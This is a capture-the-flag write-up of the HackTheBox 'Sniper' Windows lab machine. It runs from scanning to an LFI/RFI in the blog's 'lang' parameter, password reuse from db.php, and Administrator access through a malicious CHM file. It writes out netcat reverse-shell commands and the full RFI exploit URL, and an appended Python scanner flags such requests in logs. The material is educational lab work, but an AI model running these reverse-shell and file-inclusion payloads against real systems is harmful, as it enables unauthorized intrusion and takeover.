HackTheBox Writeup — Sniper

Hello guys, I am Faisal Husaini. My username on HTB is “kNgF”. Also join me on Discord.

The IP of this box is 10.10.10.151

Running masscan on it, we get

masscan -p1-65535,U:1-65535 10.10.10.151 --rate=1000 -e tun0

Running Nmap against the discovered open ports

Since only 4 ports are open, and the web server is the most interesting of them, we move to the web part first

Running Gobuster against the web server

We see some good results, so we move on to the /blog directory

Clicking on the Language drop-down

The parameter “lang” is a potential LFI, so we try some entries on it

While trying to access some Windows files like “Windows/system32/drivers/etc/hosts” and “Windows/win.ini”, we get different results, but due to the web app's behaviour we cannot see them clearly, so we look at the page source

We see that we hit the LFI successfully, so now we try for RFI by creating a simple phpinfo() PHP file and testing it

For RFI, we will use Samba to share the files so that we can test it

Here we first tried the smbserver tool from Impacket, which unfortunately did not work in this case, so we tried Samba instead, which we had to install and set up on our local machine, first by installing it with “apt-get install samba”

Here is the PHP script we will test; we also set up the Samba config file now

Now we start the smbd server with the command “service smbd start”

Moving on to the vulnerable URL to test our PHP file

Here we clearly see that the RFI works, so now we move on to getting command execution, for which we create one more simple PHP file

We can use this to get command execution, so let's test it

We see that it was accessed successfully; since we did not provide any parameter, we got no results, so let's test a simple “dir” command

We get good results; to see the output in a readable format, we need to check the page source

But using Windows commands like this is a pain, so we try to get a reverse shell connection

So I also upload a Windows netcat binary to our SMB share so that we can use it

http://10.10.10.151/blog/?lang=\\10.10.14.71\KNGF\kngf_rev.php&kngf=\\10.10.14.71\KNGF\nc64.exe%20-e%20powershell.exe%2010.10.14.71%209001

The above is the final URL used for the reverse shell; looking back at the netcat listener
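From the defender's side, the two request shapes used above (traversal into Windows system files through the lang parameter, and UNC paths to a remote SMB share) are easy to spot in web server logs. The following is an added example, not part of the original writeup: it scans constructed IIS W3C-style log lines (the field order and sample values are assumptions) and flags both patterns per request.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines in IIS W3C order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
# Lines 2 and 3 mirror the requests described in the writeup; lines 1 and 4 are benign.
SAMPLE_LOG = r"""
2019-11-10 10:01:02 10.10.10.151 GET /blog/ lang=blog-en.php 80 - 10.10.14.71 Mozilla/5.0 200
2019-11-10 10:02:15 10.10.10.151 GET /blog/ lang=../../../../Windows/win.ini 80 - 10.10.14.71 Mozilla/5.0 200
2019-11-10 10:03:40 10.10.10.151 GET /blog/ lang=\\10.10.14.71\KNGF\kngf_rev.php&kngf=\\10.10.14.71\KNGF\nc64.exe%20-e%20powershell.exe 80 - 10.10.14.71 Mozilla/5.0 200
2019-11-10 10:04:01 10.10.10.151 GET /blog/ lang=blog-es.php 80 - 10.10.14.80 Mozilla/5.0 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")                       # ../ or ..\
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")                     # \\host\share\...
SENSITIVE = re.compile(r"(?i)windows[\\/](win\.ini|system32)")  # classic LFI probe targets


def classify_query(query: str) -> list[str]:
    """Return a finding per parameter value that looks like an LFI or RFI attempt."""
    findings = []
    # parse_qs URL-decodes values, so %20 and friends are already resolved here
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if UNC_PATH.match(value):
                findings.append(f"{name}: UNC path to remote share (possible RFI)")
            elif TRAVERSAL.search(value) or SENSITIVE.search(value):
                findings.append(f"{name}: traversal / system file read (possible LFI)")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, cs-uri-query, findings) for every log line with a finding."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or line.startswith("#") or len(fields) < 9:
            continue  # header lines, blank lines or truncated records
        uri_query, client_ip = fields[5], fields[8]
        findings = classify_query(uri_query)
        if findings:
            hits.append((client_ip, uri_query, findings))
    return hits


if __name__ == "__main__":
    for client_ip, query, findings in scan_log(SAMPLE_LOG):
        print(client_ip, query, findings)
```

In a real deployment the same classifier would run over the live log stream, and a UNC hit should additionally be correlated with outbound SMB (TCP 445) from the web server, which a web host normally has no reason to initiate.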

We got a reverse shell successfully, so now we move further into enumeration

As we were spawned in the webroot directory, and we remember from the Gobuster scan that there was a directory named user, we move into that directory and list the files and folders

There is an interesting PHP file named db.php which might contain some creds

We see a dbuser password, which might also be the password for a user account, so we check the users present on the machine

We see that there is a user “Chris” on the box, so we use PowerShell to switch user with the commands below

As soon as we enter the last command, we get a new user prompt

We can see that we switched to the Chris user successfully, so now we move on to the user flag, which is usually located in the user's Desktop folder

But we see that we cannot run any command here except whoami, maybe due to an improper shell, so we try to get another one by the same method

Looking back at the other netcat listener

We got a proper reverse shell now, so we move back to getting the user flag

Moving on to the privilege escalation part

Looking at the main directory

We see a not-so-common folder, Docs; entering it and listing its contents

We see 2 files, one a txt file and the other a pdf file; looking at the contents of the note.txt file

We see a message for the user Chris; if we look closely, the Sniper CEO says to drop a file there. Maybe there is an automated task running

So we will create a CHM file using Nishang's Out-CHM.ps1 PowerShell script in a Windows VM

Here is the script we used, along with the command at the end

Out-CHM -Payload "C:\Users\Chris\Desktop\nc64.exe -e powershell.exe 10.10.14.165 9003" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

As soon as we run the script, the CHM file is created in the current location, i.e. the Desktop folder, so we copy it to our Linux machine and then transfer it to the remote Sniper machine

So here we uploaded the CHM file to the /Docs folder, having set up our netcat listener beforehand; as soon as the file is uploaded, we move to the listener

We immediately got a reverse shell connection, this time as Administrator, and we move further to get the root flag, which is usually stored in the Desktop folder
